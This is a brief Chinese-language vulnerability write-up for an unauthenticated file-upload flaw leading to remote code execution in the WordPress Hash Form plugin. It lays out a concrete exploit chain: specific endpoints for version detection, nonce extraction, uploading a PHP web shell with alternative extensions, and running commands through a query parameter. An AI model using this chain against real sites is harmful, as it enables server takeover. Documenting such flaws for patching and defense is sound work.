CVE-2026-81780 — Hash Form 远程代码执行漏洞
漏洞详情
WordPress Hash Form 插件(≤ 1.4.2)存在未授权文件上传漏洞。该插件允许任意文件上传,且未进行适当的身份验证或文件类型校验,从而导致远程代码执行(RCE)。
漏洞利用链
步骤 操作 1 攻击者通过 readme.txt 检测 Hash Form 插件 2 通过预览表单(hashform_preview)提取 ajax_nounce 3 向 hashform_file_upload_action 发送携带 PHP 载荷的 POST 请求 4 以 .phar、.phtml、.php5 或 .php7 扩展名上传 Web Shell 5 通过访问 /wp-content/uploads/hashform/temp/v.{ext} 触发 Shell 6 通过 ?c=id 执行系统命令
GET /wp-content/plugins/hash-form/readme.txt
↓
检测到版本(≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
提取 Nonce:ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
上传:v.phar(或 .phtml、.php5、.php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
命令已执行(uid=www-data)```